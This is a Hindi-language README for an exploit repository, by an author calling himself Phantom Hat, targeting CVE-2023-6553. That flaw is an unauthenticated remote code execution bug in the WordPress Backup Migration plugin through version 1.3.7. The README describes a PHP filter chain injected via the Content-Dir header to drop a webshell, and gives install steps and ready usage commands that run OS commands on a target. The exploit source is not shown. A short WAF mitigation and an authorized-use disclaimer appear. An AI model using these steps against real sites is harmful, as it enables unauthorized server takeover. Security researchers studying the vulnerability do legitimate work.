
वर्डप्रेस के लिए Backup Migration प्लगइन संस्करण 1.3.7 तक (इस संस्करण सहित) सभी संस्करणों में /includes/backup-heart.php फ़ाइल के माध्यम से रिमोट कोड निष्पादन के लिए असुरक्षित है।
| गुण | विवरण |
|---|---|
| CVE ID | CVE-2023-6553 |
| CVSS स्कोर | 9.8 / 10 — गंभीर |
| CVSS वेक्टर | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-94 — कोड निर्माण का अनुचित नियंत्रण |
| प्रभावित प्लगइन | बैकअप माइग्रेशन (स्लग: backup-backup) |
| प्रभावित संस्करण | ≤ 1.3.7 |
| प्रमाणीकरण | कोई आवश्यकता नहीं (अप्रमाणित) |
| खोजकर्ता | Wordfence |
वर्डप्रेस के लिए बैकअप माइग्रेशन प्लगइन /includes/backup-heart.php फ़ाइल के माध्यम से 1.3.7 तक के सभी संस्करणों में रिमोट कोड निष्पादन के लिए संवेदनशील है।
भेद्यता इसलिए मौजूद है क्योंकि हमलावर Content-Dir HTTP हेडर के माध्यम से PHP include स्टेटमेंट को पास किए गए मानों को नियंत्रित कर सकता है। PHP फ़िल्टर चेन का लाभ उठाकर, हमलावर प्रमाणीकरण के बिना मनमाना PHP कोड इंजेक्ट कर सकता है — जिससे सर्वर पर पूर्ण रिमोट कोड निष्पादन प्राप्त होता है।
┌──────────┐ Content-Dir हेडर ┌──────────────────────┐ include() ┌──────────┐
│ हमलावर │ ──── PHP फ़िल्टर चेन ──▶│ backup-heart.php │ ──────────────▶ │ RCE │
│ │ (कोई auth आवश्यक नहीं)│ (कमजोर फ़ाइल) │ │ होस्ट पर│
└──────────┘ └──────────────────────┘ └──────────┘
readme.txt के माध्यम से इंस्टॉल किए गए प्लगइन संस्करण का पता लगाएंContent-Dir हेडर में तैयार चेन भेजें.
├── exploit.py # 🎯 स्वच्छ, पेशेवर एक्सप्लॉइट (वर्बोज़ मोड समर्थित)
├── fancy_exploit.py # ✨ फैंसी संस्करण — वही एक्सप्लॉइट, बेहतर वाइब्स
├── php_filter_chain.py # 🔗 PHP फ़िल्टर चेन जनरेटर मॉड्यूल
└── README.md # 📖 आप यहाँ हैं
exploit.py — पेशेवर एक्सप्लॉइटप्राथमिक, स्वच्छ एक्सप्लॉइट स्क्रिप्ट जो सुरक्षा मूल्यांकन और केस स्टडीज़ में पेशेवर उपयोग के लिए डिज़ाइन की गई है। विशेषताएँ:
-v)-C)fancy_exploit.py — फैंसी संस्करण ✨उसी एक्सप्लॉइट का एक अधिक अभिव्यक्तिशील संस्करण जिसमें अतिरिक्त व्यक्तित्व है। कार्यात्मक रूप से exploit.py के समान लेकिन अधिक रंगीन प्रस्तुति के साथ:
नोट: दोनों स्क्रिप्ट में समान हमला तर्क है —
fancy_exploit.pyकेवल अनुभव को अधिक दृश्य रूप से अभिव्यक्तिशील आउटपुट परत में लपेटता है।
pip पैकेज मैनेजर# रिपॉजिटरी को क्लोन करें
git clone https://github.com/<your-username>/CVE-2023-6553.git
cd CVE-2023-6553
# निर्भरताएँ स्थापित करें
pip install -r requirements.txt
नोट:
php_filter_chain.pyरिपॉजिटरी में शामिल एक स्थानीय मॉड्यूल है — किसी अतिरिक्त स्थापना की आवश्यकता नहीं है।
exploit.py
# जाँचें कि लक्ष्य कमजोर है या नहीं (केवल टोही)
python3 exploit.py -u http://target.com -C
# एक्सप्लॉइट करें और एक कमांड निष्पादित करें
python3 exploit.py -u http://target.com -c id
# पहले भेद्यता जाँचें, फिर एक्सप्लॉइट करें
python3 exploit.py -u http://target.com -C -c whoami
# विस्तृत आउटपुट के लिए वर्बोज़ मोड
python3 exploit.py -u http://target.com -c id -v
fancy_exploit.py
# जाँचें कि लक्ष्य कमजोर है या नहीं
python3 fancy_exploit.py -u http://target.com -C
# एक्सप्लॉइट करें और एक कमांड निष्पादित करें
python3 fancy_exploit.py -u http://target.com -c id
# पहले जाँचें, फिर कमजोर होने पर एक्सप्लॉइट करें
python3 fancy_exploit.py -u http://target.com -C -c whoami
| फ़्लैग | विवरण |
|---|---|
-u, --url | (आवश्यक) लक्ष्य WordPress URL |
-c, --command | पोस्ट-एक्सप्लॉइटेशन पर निष्पादित करने के लिए OS कमांड |
-C, --check | बिना एक्सप्लॉइट किए भेद्यता स्थिति जाँचें |
-v, --verbose | वर्बोज़ आउटपुट सक्षम करें (केवल exploit.py) |
| चरण | नाम | विवरण |
|---|---|---|
| 1 | 🔍 टोही | इंस्टॉल किए गए प्लगइन संस्करण का पता लगाने के लिए readme.txt प्राप्त करता है |
| 2 | 🧪 पेलोड उत्पादन | एक PHP फ़िल्टर चेन बनाता है जो एक वेबशेल ड्रॉपर में डिकोड होती है |
| 3 | 💣 एक्सप्लॉइट वितरण | Content-Dir हेडर के माध्यम से पेलोड को backup-heart.php पर भेजता है |
| 4 | 🚀 कमांड निष्पादन | निर्दिष्ट OS कमांड के साथ तैनात वेबशेल को ट्रिगर करता है |
Content-Dir हेडर को ब्लॉक करने के लिए एक वेब एप्लिकेशन फ़ायरवॉल (WAF) नियम लागू करेंयह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच कंप्यूटर फ्रॉड एंड एब्यूज एक्ट (CFAA), कंप्यूटर मिसयूज़ एक्ट और दुनिया भर में समान कानूनों के तहत अवैध है। लेखक इस सॉफ़्टवेयर के दुरुपयोग के लिए कोई दायित्व नहीं मानता है।
इस उपकरण का उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके मालिक हैं या जिनके परीक्षण के लिए स्पष्ट लिखित प्राधिकरण है।
लेखक: Phantom Hat
केवल अधिकृत पेनिट्रेशन परीक्षण और सुरक्षा अनुसंधान के लिए।